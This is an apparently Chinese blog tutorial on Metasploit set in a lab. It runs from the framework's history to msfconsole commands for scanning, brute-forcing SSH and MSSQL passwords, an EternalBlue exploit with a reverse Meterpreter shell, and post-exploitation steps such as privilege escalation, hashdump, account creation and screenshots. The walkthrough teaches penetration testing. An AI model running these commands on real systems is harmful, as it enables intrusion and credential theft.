【CyberSecurityLearning 67】Metasploit(MSF)
目錄
Metasploit 簡介
* 誕生與發展
* 技術架構
??? @?? 輔助模塊
??? @?? 滲透攻擊模塊
??? @?? 攻擊載荷模塊
??? @?? 空指令模塊
??? @?? 編碼器模塊
??? @?? 后滲透攻擊模塊
??? @??? 免殺模塊
*為什么使用Metasploit ?
@ 情報搜集階段
@威脅建模階段
@ 漏洞分析階段
?@后滲透攻擊階段
@ 報告生成階段
MSF使用
啟動MSF
MSF的更新
基本命令
情報搜集
*網站敏感目錄掃描
目錄掃描實驗演示:
*主機發現
*端口掃描
*探測服務詳細信息
*服務查點
@ telnet 服務查點
@ ssh服務查點
實驗演示:掃描內外中開啟SSH的主機有哪些
@ MSSL 服務查點
*口令猜測
@ ssh 服務口令猜解
@ MSSQL 服務口令猜解
網絡服務滲透攻擊
*MS17-010 “永恒之藍”
漏洞掃描
攻擊
永恒之藍實驗演示:
*參數說明
Meterpreter
*常用基本命令
部分命令演示
?
Metasploit 簡介
??? Metasploit 是一個開源的滲透測試開源軟件,也是一個逐步發展成熟的漏洞研究與滲透測試代碼開發平臺(可擴展),此外也將成為支持整個滲透測試過程的安全技術集成開發與應用環境(MSF最牛逼的地方)。它的商業版本非常厲害(貴!)
* 誕生與發展
??? Metasploit 項目最初是由HD Moore 在2003 年夏季創立,目標是成為滲透攻擊研究與代碼開發的一個開放資源(目標:就是想把很多滲透測試的工具做一個集成,而且這些工具是可以修改的,根據不同環境進行定制)。
??? HD Moore在2003 年的10月發布了他的第一個基于Perl 語言(pl)的Metasploit 版本,當時一共集成了11個滲透攻擊模塊。
??? 在Spoonm 的幫助下,完全重寫了Metasploit 的代碼,并在2004 年4月發布了Metasploit v2.0 ,版本中已經包含了18個滲透攻擊模塊和27 個攻擊載荷(payload),并提供了控制臺終端,命令行和Web 三個使用接口。【舉例:假設某一個系統當中存在一個遠程代碼執行漏洞,就是我們可以執行命令,執行命令這個攻擊操作是滲透攻擊模塊來完成的。攻擊載荷就是我們在利用這個漏洞的同時,打通一個隧道、建立一個連接。就是我們在漏洞利用工具執行代碼的時候,執行的是payload,payload的作用就是打通一個隧道,類似反彈shell一樣】
??? 在2004 年8月,HD 和Spoonm 帶著最新發布的Metasploit v2.2 并在拉斯維加斯舉辦的BlackHat 全球黑客大會上進行了演講。聽眾被Metasploit 的強大之處所折服,并一致認為:Metasploit 時代已經到來。更多的黑客加入Metasploit 核心開發團隊與貢獻滲透攻擊、載荷與輔助模塊代碼。
??? 在2005 年的CanSecWest 黑客會議上,HD 和Spoonm 指出了Metasploit v2 體系框架中的一些難以解決的難題,包括:
??? ·? 缺乏跨平臺支持,特別是不能很好地運行在Windows 系統上。
??? ·? 很難支持自動化滲透攻擊過程
??? ·? Perl 語言的復雜性和缺點使得外部貢獻者與用戶規模增長不相適應
??? ·? Perl 語言對一些復雜特性的支持能力較弱等。
??? 而且v2 版本是完全圍繞著滲透攻擊而設計的,對信息搜集與后滲透攻擊階段無法提供有效支持。經過18個月的時間,Metasploit 團隊使用Ruby 語言完全重寫了Metasploit ,并在2007 年5月發布了v3.0 版本,其中包含177 個滲透攻擊模塊、104 個攻擊載荷模塊以及30 個新引入的輔助模塊(這里面的輔助模塊,可以簡單理解為掃描爆破模塊,掃描端口、主機、漏洞等)。
??? Metasploit v3.0 的發布使得Metasploit 不在限于用作滲透攻擊軟件,而真正成為一個事實上的滲透測試技術研究與開發平臺。
??? 2009 年10月,Metasploit 項目被一家滲透測試技術領域的知名安全公司Rapid7 所收購。Rapid7 公司隨后與2010 年10月推出了Metasploit Express 和Pro 商業版本。
??? Metasploit v4.0 在2011 年8 月發布。v4.0 版本在滲透攻擊、攻擊載荷與輔助模塊的數量上都有顯著的擴展,此外還引入一種新的模塊類型——后滲透攻擊模塊(就是做一個長期的權限維持,做一個攻擊成果的進一步擴展),以支持在滲透攻擊環節中進行敏感信息搜集、內網拓展等一系列的攻擊測試。?? ?
??? Metasploit v5.0 在2019 年1月份發布。Metasploit 5.0 使用了新的數據庫,并提供了一種新的數據服務。新版本引入了新的規避機制(evasion capabilities)【這個模塊專門用來免殺,就是逃過殺毒軟件得到查殺】,支持多項語言,框架建立在不斷增長的世界級攻擊性內容庫的框架基礎上。另外,此次更新還包括了可用性改進和大規模開發的支持,數據庫和自動化 API 的改進等。
我們現在用的都是5.0/6.0版本
* 技術架構
??? @?? 輔助模塊
??? Metasploit 為滲透測試的信息搜集環節提供了大量的輔助模塊支持,包括針對各種網絡服務的掃描與查點、構建虛假服務收集登錄密碼(就是構建釣魚網站)、口令猜測破解、敏感信息嗅探、探查敏感信息泄露、Fuzz 測試發掘漏洞、實施網絡協議欺騙等模塊。
??? 輔助模塊能夠幫助滲透測試者在滲透攻擊之前取得目標系統豐富的情報信息。
??? @?? 滲透攻擊模塊
??? 滲透攻擊模塊是利用發現的安全漏洞或配置弱點對目標系統進行攻擊,以植入和運行攻擊載荷,從而獲取對遠程目標系統訪問權的代碼組件。
??? 主動滲透攻擊所利用的安全漏洞位于網絡服務端軟件與服務承載的上層應用程序之中,由于這些服務通常是在主機上開啟一些監聽端口并等待客戶端連接,因此針對它們的滲透攻擊可以主動發起,通過連接目標系統網絡服務,注入一些特殊構造的包含"邪惡"攻擊數據的網絡請求內容,觸發安全漏洞,并使得遠程服務進程執行在"邪惡"數據中包含攻擊載荷,從而獲取目標系統的控制會話。
??? 被動滲透攻擊利用的漏洞位于客戶端軟件中,如瀏覽器、瀏覽器插件、電子郵件客戶端、Office 與Adobe 等各種文檔閱讀與編輯軟件。對于這類存在于客戶端軟件的安全漏洞,我們無法主動地將數據從遠程輸入到客戶端軟件中,因此只能采用被動滲透攻擊的方式,即構造出"邪惡"的網頁、電子郵件或文檔文件,并通過架設包含此類惡意內容的服務、發送郵件附件、結合社會工程學分發并誘騙目標用戶打開、結合網絡欺騙和劫持技術等方式,等目標系統上的用戶訪問到這些邪惡的內容,從而觸發客戶端軟件中的安全漏洞,給出控制目標系統的Shell 會話。
主動滲透攻擊就是對方開一個服務,然后你主動去打它
被動滲透攻擊就是你整一個釣魚網站/植入木馬...這個需要受害者主動觸發
比如攻擊office軟件,Adobe。。。客戶端軟件,就是被動滲透測試攻擊
??? @?? 攻擊載荷模塊
??? 攻擊載荷是在滲透攻擊成功后使目標系統運行的一段植入代碼,通常作用是為滲透攻擊者打開在目標系統上的控制會話連接。
比如發現RCE遠程代碼執行漏洞,我們到底讓他執行什么代碼,讓他執行payload,payload的作用就是建立一個會話,就是一個隧道
??? @?? 空指令模塊
??? 空指令(NOP) 是一些對程序運行狀態不會造成任何實質影響的空操作或者無關操作指令,最典型的空指令就是空操作,在x86 CPU 體系架構平臺上的操作碼是0x90 。
??? @?? 編碼器模塊
??? 攻擊載荷模塊與空指令模塊組裝完成一個指令序列后,在這段指令被滲透攻擊模塊加入邪惡數據緩沖區交由目標系統運行之前,Metasploit 框架還需要完成一道非常重要的工序--編碼。
??? 編碼器模塊的第一個使命就是確保攻擊載荷中不會出現滲透攻擊過程中應加以避免的"壞字符"。(壞字符:比如00,字符串的結束,類似于這些字符都給你做一個編碼)
??? 編碼器的第二個使命就是對攻擊載荷進行"免殺"處理。
??? @?? 后滲透攻擊模塊
??? 后滲透攻擊模塊主要支持在滲透攻擊取得目標系統控制權之后,在受控系統中進行各式各樣的后滲透攻擊動作,比如獲取敏感信息、進一步拓展、實施跳板攻擊等。
??? @??? 免殺模塊
??? 對攻擊載荷進行"免殺"處理。
?
*為什么使用Metasploit ?
滲透攻擊是目前Metasploit 最強大和最具吸引力的核心功能,Metasploit 框架中集成了數百個針對主流操作系統平臺上 不同網路服務于應用軟件安全漏洞的滲透攻擊模塊,可以由用戶在滲透攻擊場景中根據漏洞掃描結果進行選擇,并能夠自由裝配該平臺上適用的具有指定功能的攻擊載荷,然后通過自動化編碼機制繞過攻擊限制與檢測,對目標系統實施遠程攻擊。獲取系統的訪問控制權。
除了滲透攻擊之外,Metasploit 在發展過程中逐漸增加了對滲透測試全過程的支持,包括情報搜集、威脅建模、漏洞分析、后滲透攻擊與報告生成。
其實我們開發版本比Pro版本要強大,就是少了生成報告的功能,而且Pro版本是有售后的,這就是區別。開發版本要比商業版本里面腳本要多很多,各有利弊。
MSF可以貫穿我們整個滲透測試的全過程,就相當于一個工具在手,天下我有,號稱MSF可以日穿宇宙(但是burpsuite是不可取代的)
?
@ 情報搜集階段
MSF有一個比較牛逼的地方就是它可以去集成數據庫,就是你把你所有的結果都可以存到數據庫里面(作用:1、數據保存,方便后期導出滲透測試報告 2、共享)
Metasploit 一方面通過內建的一系列掃描器與查點輔助模塊來獲取遠程服務器信息,另一方面通過插件機制集成調用Nmap、Nessus、OpenVAS 等著名業界的開源網路掃描工具,從而具備全面的信息搜集能力,為滲透攻擊實施提供必不可缺德精確情報。(MSF可以自動集成Nmap、Nessus、OpenVAS)
@威脅建模階段
在搜集信息之后,Metasploit 支持一系列數據庫命令操作直接將這些信息匯總至PostgreSQL、MYSQL、SQLite數據庫中,并為用戶提供易用的數據庫查詢命令,可以幫助滲透測試者對目標系統搜到的情報進行威脅建模,從中找出可行的攻擊路徑(就是尋找一些最可行的攻擊路徑)
@ 漏洞分析階段
除了信息搜集環節能夠直接掃描出一些已公布德安全漏洞之外,Metassploit 中還提供了大量德協議Fuzz 測試器與Web 應用漏洞探測分析模塊,支持具有一定水平能力德滲透測試者在實際過程中嘗試挖掘出0day 漏洞,并對漏洞機理與利用方法進行深入分析,而這將為滲透攻擊目標帶來更大的殺傷力,并提升滲透測試流程的技術含金量。
?
@后滲透攻擊階段
在成功實施滲透攻擊并獲取目標系統的遠程控制權之后,Metasploit 框架中另一個極具威名的工具Meterpreter 在后滲透攻擊階段提供了強大的功能。
Meterpreter 可以看作一個支持多操作系統平臺,可以 僅僅駐留于內存中并具備免殺能力的高級后門工具,Meterpreter 中實現了特權提升、信息抓取、系統監控、跳板攻擊與內網拓展等多樣化的功能特性,此外還支持一種靈活可擴展的方式來加載額外的功能的后滲透攻擊模塊
?
@ 報告生成階段
Metssploit 框架獲得的滲透測試結果可以輸入至內置數據庫中,因此這些結果可以通過數據庫查詢來獲取,并輔助滲透測試報告的寫作。
商業版(pro)具備了更強大的報告生成功能,可以輸出HTML、XML、Word 和PDF格式的報告。
?
MSF使用
啟動MSF
[msfconsole]
MSF 的安裝目錄:
[/usr/share/metasploit-framework/]??????? kali的工具都按照在/usr/share這個目錄下
MSF的更新
[apt-get update]??? # 更新索引
[apt-get install metasploit-framework] #重新安裝
MSF當中有一些模塊,它都是以模塊出現,什么是模塊簡單理解:一個模塊就是一個rb 腳本(ruby腳本)
基本命令
info?? 查看模塊的詳細信息
set??? 設置
show options
exploit
back?? 返回主目錄
exit?? 退出msf
情報搜集
*網站敏感目錄掃描
可以借助Metasploit 中的brute_dirs、dir_listing、dir_scanner 等輔助模塊來進行敏感目錄掃描。
他們主要使用暴力猜解的方式工作,主要此處需要提供一個目錄字典。
msf5 > use auxiliary/scanner/http/dir_scanner????? //auxiliary(a.附屬的)叫輔助模塊??? 輔助模塊下的掃描器,掃描http的,去掃描敏感命令的? //我們use的時候要從輔助模塊開始進
msf5 auxiliary(scanner/http/dir_scanner) > set RHOSTS 192.168.1.200?? //可以用set命令做一些設置? set rhost:設置遠程地址
RHOSTS => 192.168.1.200
msf5 auxiliary(scanner/http/dir_scanner) > set PATH /cms/?????? //set path就是設置web起始路徑
PATH => /cms/
msf5 auxiliary(scanner/http/dir_scanner) > set THREADS 50??? //給50個線程
THREADS => 50
msf5 auxiliary(scanner/http/dir_scanner) > exploit??? //開始進行攻擊
dir_scanner 模塊可以發現網站上的一些目錄,Admin、admin、images。只要字典足夠強大,可以找到更多的敏感目錄。(這個敏感命令掃描跟御劍比較像)
目錄掃描實驗演示:
對cms文章管理系統做一個目錄掃描(打開win2k8:192.168.3.129)
1、開啟msf
msfconsole
2、使用掃描模塊
use? auxiliary/scanner/http/???????? 發現http里面有261個掃描模塊
上圖這261個都是專門做http掃描的,那這些模塊究竟怎么用?如何用
3、進入dir_scanner模塊
use? auxiliary/scanner/http/dir_scanner
這個模塊怎么用呢?命令info?? 查看我們這個模塊的詳細信息
對cms網站做一個目錄的掃描:
掃描目標:http://192.168.3.129/cms/
4、設置目標的地址(RHOSTS)
set RHOSTS 192168.3.129
5、起始路徑是/cms/
set PATH /cms/
顯示配置信息:show options
6、設置線程
set THREADS 50
7、exploit進行掃描(取決于你的字典是否強大)
?
*主機發現
Metasploit 中提供了一些輔助模塊可用于主機的發現,這些模塊位于
??? modules/auxiliary/scanner/discovery/目錄下
??? auxiliary/scanner/discovery/arp_sweep????????????
??? auxiliary/scanner/discovery/empty_udp
??? auxiliary/scanner/discovery/ipv6_multicast_ping
??? auxiliary/scanner/discovery/ipv6_neighbor
??? auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement
??? auxiliary/scanner/discovery/udp_probe
??? auxiliary/scanner/discovery/udp_sweep
可以使用arp_sweep 來枚舉本地局域網中的所有活躍主機(nmap比他快多了)
??? ---------使用命令----------------
??? msf5 > use auxiliary/scanner/discovery/arp_sweep
??? msf5 auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 192.168.1.2/24
??? RHOSTS => 192.168.1.2/24
??? msf5 auxiliary(scanner/discovery/arp_sweep) > set ThREADS 50
??? ThREADS => 50
??? msf5 auxiliary(scanner/discovery/arp_sweep) > exploit
??? ------------------------
?
*端口掃描
Metasploit 的輔助模塊中提供了幾款實用的端口掃描器
auxiliary/scanner/portscan/ack
auxiliary/scanner/portscan/syn
auxiliary/scanner/portscan/xmas
auxiliary/scanner/portscan/ftpbounce
auxiliary/scanner/portscan/tc
一般情況下推薦使用syn 端口掃描器,因為他速度快,結果比較準確不易被對方察覺
??? -----使用命令--------
??? msf5 > use auxiliary/scanner/portscan/syn
??? msf5 auxiliary(scanner/portscan/syn) > set RHOSTS 192.168.1.200
??? RHOSTS => 192.168.1.200
??? msf5 auxiliary(scanner/portscan/syn) > set THREADS 50
??? THREADS => 50
??? msf5 auxiliary(scanner/portscan/syn) > exploit
??? ---------------
*探測服務詳細信息
在Metasploit 中使用一些插件可以調用系統中的命令,比如可以使用Nmap 探測目標的詳細服務信息,命令
[nmap -sS -Pn 192.168.1.200 -sV],參數說明:
-sS 使用SYN 半連接掃描
-Pn 早掃描之前,不發生ICME echo 請求測試目標是否活躍
-sV 探測服務詳細版本
?
*服務查點
在Metassploit 的輔助模塊中,有很多用于服務掃描和查點的工具,這些工具通常以[service_name]_version 命名。該模塊可用于遍歷網絡中包含的某種服務的主機,并進一步確定服務版本。
@ telnet 服務查點
telnet 是一個先天缺乏安全性的網絡服務。由于Telnet 沒有對傳輸的數據進行加密,越來越多的管理員漸漸使用更為安全的SSH 協議代替它 。盡管如此,很多價格昂貴、使用壽命長的大型交換機使用Telnet 協議的可能性更大,而此類交換機在網絡中的位置一般來說非常重要。可以使用telnet_version 模塊掃描一下是否有主機或設備開啟了Telnet 服務
nmap是查某一個主機開放了哪些服務
我們這個telnet掃描是查看哪些主機開啟了telnet
一正一反結合著用
?msf5 > use auxiliary/scanner/telnet/telnet_version
msf5 auxiliary(scanner/telnet/telnet_version) > set RHOSTS 192.168.1.200/24
RHOSTS => 192.168.1.200/24
msf5 auxiliary(scanner/telnet/telnet_version) > set THREADS 50
THREADS => 50
msf5 auxiliary(scanner/telnet/telnet_version) > exploit
?
@ ssh服務查點
通常管理員會使用SSH 對服務器進行遠程管理,服務器會向SSH 客戶端返回一個遠程Shell 連接。如果沒有做其他的安全增強配置,只要獲取服務的登錄口令,就可以使用SSH 客戶端登錄服務器,那就相當于獲取了登錄用的所有權限。
可以使用ssh_version 模塊遍歷網絡中開啟的SSH 服務的主機
?
-------------
msf5 > use auxiliary/scanner/ssh/ssh_version
msf5 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.200/24
RHOSTS => 192.168.1.200/24
msf5 auxiliary(scanner/ssh/ssh_version) > set THREADS 50
THREADS => 50
msf5 auxiliary(scanner/ssh/ssh_version) > exploit
---------------
實驗演示:掃描內外中開啟SSH的主機有哪些
我們用的是use auxiliary/scanner/ssh/ssh_version
back返回主目錄(exit退出msf)
1、
2、
192.168.3.132是我們kali的ip,掃出這臺主機開了ssh,我們嘗試爆破
3、?use auxiliary/scanner/ssh/ssh_login(ssh_login是爆破模塊)
USER_AS_PASS是用戶名和密碼反向
4、這里面我們準備一個字典
5、
相應的我們可以去爆破ssh、telnet、mysql、MSSQL、ftp....
?
@ MSSL 服務查點
可以使用mysql_ping 查找網絡模塊中的Microsoft SQL Server
msf5 > use auxiliary/scanner/mssql/mssql_ping
msf5 auxiliary(scanner/mssql/mssql_ping) > set RHOSTS 192.168.1.200/24
RHOSTS => 192.168.1.200/24
msf5 auxiliary(scanner/mssql/mssql_ping) > set THREADS 50
THREADS => 50
msf5 auxiliary(scanner/mssql/mssql_ping) > exploit
?
*口令猜測
@ ssh 服務口令猜解
----------------
msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > set USER_FILE /root/msf/user.dic
USER_FILE => /root/msf/user.dic????????????? ?
msf5 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /root/msf/pass.dic
PASS_FILE => /root/msf/pass.dic
msf5 auxiliary(scanner/ssh/ssh_login) > set THREADS 50
THREADS => 50
msf5 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.1.150
RHOSTS => 192.168.1.150
msf5 auxiliary(scanner/ssh/ssh_login) > exploit
-----------------
?
@ MSSQL 服務口令猜解
msf5 > use auxiliary/scanner/mssql/mssql_login
msf5 auxiliary(scanner/mssql/mssql_login) > set RHOSTS 172.16.132.135
RHOSTS => 172.16.132.135
msf5 auxiliary(scanner/mssql/mssql_login) > set USER_FILE /root/dic/user.dic
USER_FILE => /root/dic/user.dic
msf5 auxiliary(scanner/mssql/mssql_login) > set PASS_FILE /root/dic/pwd.dic
PASS_FILE => /root/dic/pwd.dic
msf5 auxiliary(scanner/mssql/mssql_login) > set THREADS 50
THREADS => 50
msf5 auxiliary(scanner/mssql/mssql_login) > exploit
網絡服務滲透攻擊
*MS17-010 “永恒之藍”
漏洞掃描
---------------
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.200/24
RHOSTS => 192.168.1.200/24
msf5 auxiliary(scanner/smb/smb_ms17_010) > set THREADS 50
THREADS => 50
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit
-----------------
攻擊
??? ------------------
??? msf5 > use exploit/windows/smb/ms17_010_eternalblue
??? msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
??? payload => windows/x64/meterpreter/reverse_tcp
??? msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.200
??? RHOSTS => 192.168.1.200
??? msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.150
??? LHOST => 192.168.1.150
??? msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
??? ----------------
永恒之藍實驗演示:
1、
2、
3、
4、
發現win2008(192.168.3.129存在永恒之藍漏洞)
5、
6、
進入meterpreter
*參數說明
-p
--payload
<payload>
指定需要使用的payload (攻擊載荷)
-f
--format
<format>
指定輸出格式
-l
--list
<module_type>
列出指定模塊的所有資源
-n
--nopsled
<length>
為payload 預先指定一個NOP 滑動長度
-e
--encoder
[encoder]
指定需要使用的encoder(編碼器)
?
-a
--arch
<architecture>
指定payload 的目標架構
Meterpreter
Meterpreter是Metasploit的默認Windows系統下的Shell Code
以前Meterpreter只是Metasploit入侵時短期湊活一下用的
一旦入侵成功后就盡快上傳遠控
但是現在新一代的Meterpreter變得異常強大
我甚至感覺許多情況下用Meterpreter進行操作就足夠了
特色功能1:快速提權
Getsystem命令快速提權
實在沒有比這個簡單的了
一條指令你就擁有了System權限
Meterpreter會自己嘗試用多種方法讓你獲得System權限
特色功能2:Hashdump
運行這個命令:run post/windows/gather/hashdump
一條命令你就能夠獲得Windows的Sam 數據庫里的內容
就是經過加密的用戶名和密碼
特色功能3:直接打開3389
Getgui命令是Meterpreter新添加的命令
這個命令能夠讓你輕松的在目標系統上打開3389遠程管理
這條命令有兩個用法:run getgui -e(僅僅是打開遠程管理)
run getgui -u hacker -p s3cr3t(打開遠程管理并且創造一個新的用戶名為Hacker密碼為s3cr3t的帳號)
特色功能4:網絡嗅探
Meterpreter擁有非常強大的網絡嗅探能力
它能夠不在目標系統上安裝任何驅動的情況下進行網絡嗅探
而且它還聰明到了自己的流量要被忽略掉
特色功能5:網絡中繼
往往入侵局域網黑客碰到的最大困難時無法穿過NAT
現在有了Meterpreter就輕松了
Meterpreter能夠讓一臺你已經入侵的電腦變成中繼,來入侵同一個局域網里的其他電腦
特色功能6:截屏
截屏看到對方電腦上正在做什么
這個功能很容易理解吧
*常用基本命令
詳細:https://www.cnblogs.com/backlion/p/9484949.html
| 命令 | 解釋 |
| background | 將Meterpreter 終端隱藏在后臺(也就是說你進入這個meterpreter之后我還想用其他模塊,還想保持這個會話) |
| sessions | 查看已經成功獲取的會話。-i 選項,切入后臺會話 |
| shell | 獲取系統的控制臺shell |
| quit | 關閉當前的額Meterpreter 會話,返回MSF 終端 |
| pwd | 獲取目標主機當前的工作目錄 |
| cd | 切換目錄 |
| ls | 查看當前目錄下的內容 |
| cat | 查看文件內容 |
| edit | 編輯文件 |
| download | 下載文件 |
| search | 搜索文件 |
| ifconfig/ipconfig | 查看網卡信息 |
| route | 查看路由信息,設置路由 |
| sysinfo | 查看系統信息 |
| getuid | 獲取當前用戶id |
| ps | 查看進程 |
| getpid | 查看當前進程 |
| migrate | 切換進程 |
| execute | 執行文件 |
| kill | 終極指定PID 的進程 |
| shutdown | 關機 |
| screenshot | 屏幕快照 |
如果我們拿到 Meterpreter我們能做什么事?
部分命令演示
1、background? 將Meterpreter 終端隱藏在后臺
2、怎么切回來?sessions -i
3、shell? 獲取系統的控制臺shell
退出cmd用exit
4、quit? 關閉當前的額Meterpreter 會話,返回MSF 終端
5、pwd 顯示當前工作目錄(目標主機的)
6、cd? 切換路徑(用兩根斜線)
cd c:也行
7、ls 顯示當前路徑下所有內容(跟linux命令很像,但是不是linux命令)
8、upload? 上傳文件
upload? /root/msf/test.txt
9、cat 查看文件
10、edit 編輯文件
11、download? 下載文件(下載的默認路徑就是你啟用msf的路徑)
12、search?? 搜索文件
search -h查看幫助
13、ifconfig/ipconfig查看網卡信息
14、sysinfo?? 查看系統信息
15、getuid 獲取當前用戶權限
16、ps查看進程
17、getpid查看當前進程
17、migrant? 切換進程
在執行migrant切換進程的時候有風險,雖然msf可以無縫切換,但是容易把會話切掉
只能往下切,不能網上切
18、execute 執行文件
execute -h查看幫助
打開2008發現:
19、kill? 殺死進程
20、shutdown
21、screenshot 屏幕快照
22、鍵盤記錄:https://blog.csdn.net/nzjdsds/article/details/102767480
?
總結
以上是生活随笔為你收集整理的【CyberSecurityLearning 67】Metasploit(MSF)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 作者:李茹姣(1976-),女,博士,中
- 下一篇: 新工科背景下的大数据体系建设探析